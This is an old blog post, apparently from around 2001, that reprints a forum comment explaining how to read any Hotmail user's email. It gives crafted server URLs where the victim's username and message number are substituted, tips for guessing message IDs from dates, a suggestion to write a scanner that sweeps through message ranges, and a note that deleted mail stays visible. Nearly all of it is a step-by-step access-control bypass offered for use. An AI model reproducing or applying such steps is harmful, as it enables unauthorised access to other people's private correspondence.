Screaming Penguin - Source Does Matter

As if MS hasnt already had its share of security issues (and blame) lately, apparently there is another hole in Hotmail that will allow you to read anyones mail. Well, let me revise, not anyones mail, anyone whom uses Hotmail (which unfortunately is not anybodys whose email you would really WANT to read!)

Direct from a slashdot comment post (thanks to 'gol64738', and reprinted with zero perimission.)

---=[ Three Steps To View Someones Emails In Hotmail (rev.2) ]=---

(Tested with Internet Explorer 5)

To view full email from some elses account do the following:

1. Login normally to Hotmail with your ID (any id)

2. Use this type of link to view specific message from specific user:

http://pv2fd.pav2.hotmail.msn.com/cgi-bin/saferd?_ lang=EN&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2fc
gi%2dbin%2fgetmsg&hm___qs=%26msg%3dMSG998047250%2e 22%26start%3d1%26len%3d9999999999999999%26raw%3d0%
26login%3dusername%26domain%3dhotmail%2ecom&hm___f l=attrd&domain=hotmail.com
or
http://lw14fd.law14.hotmail.msn.com/cgi-bin/saferd ?_lang=EN&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2
fcgi%2dbin%2fgetmsg&hm___qs=%26msg%3dMSG998047250% 2e22%26start%3d1%26len%3d9999999999999999%26raw%3d
0%26login%3dusername%26domain%3dhotmail%2ecom&hm__ _fl=attrd&domain=hotmail.com

From that link change values:
MSG943322803%2e16 (Message id number, its simply a counter. %2e is escaped code for ".")
username (Hotmail account name to view)

MSG number examples: MSG943322803%2e1 , MSG943322803%2e22 , MSG943322803%2e149

(remove "%26raw%3d0" if you want to view email as 'emailbox view', instead of full raw view.)
(remove "&hm___fl=attrd&domain=hotmail.com" if you dont like the hotmail frame on top.)

Note.You need to have both numbers correct
and that username must have the message to make this link work.

Note.All those "%2e" etc. are hexadecimal ascii codes. You need to use them instead of true characters.
See here for full list: http://www.december.com/html/spec/ascii.html

3. Done. If you entered correct message number & that user has it you will see it. :)
(Test it with your own other hotmail account messages first to get the idea working.)

---=[ ideas and comments for improved viewing / scan ]=---

Now typing those message numbers manually is too much
work, you could create a small utility to automatically
scan given range of messages from specific user name.
(You need to build it to work with IE, as you must be
logged in hotmail when you want to view messages..)

It also helps to know that from the message numbers,
in you own hotmail inbox,you can see about what time
is what message number been used. eg:

MSG998289581.0 arrived on 20.08.2001
MSG997936971.27 arrived on 16.08.2001.
MSG996698372.27 arrived on 01.08.2001.
MSG975960863.0 arrived on 04.12.2000.

So you dont need to scan as many message addresses
when you know from which range you are looking at.

Test messages: (Login to hotmail,then use links to view message from my test account)

raw format view: (can copy base64 encoded files too:)
http://pv2fd.pav2.hotmail.msn.com/cgi-bin/saferd?_ lang=EN&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2fc
gi%2dbin%2fgetmsg&hm___qs=%26msg%3dMSG998047250%2e 22%26start%3d9702%26len%3d9687%26raw%3d0%26disk%3d
64%2e4%2e36%2e68_d1577%26login%3djokutesti99%26dom ain%3dhotmail%2ecom&hm___fl=attrd&domain=hotmail.c om

email box view: (can see any attached images directly etc.:)
http://pv2fd.pav2.hotmail.msn.com/cgi-bin/saferd?_ lang=EN&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2fc
gi%2dbin%2fgetmsg&hm___qs=%26msg%3dMSG998047250%2e 22%26start%3d9702%26len%3d9687%26disk%3d64%2e4%2e3
6%2e68_d1577%26login%3djokutesti99%26domain%3dhotm ail%2ecom&hm___fl=attrd&domain=hotmail.com

*Side note on deleting messages in Hotmail:
-You can also see the message even if its deleted!
If you delete a message in hotmail, and
also empty trashcan, the message is still
viewable using this type of link.

  Homtail security hole: techTV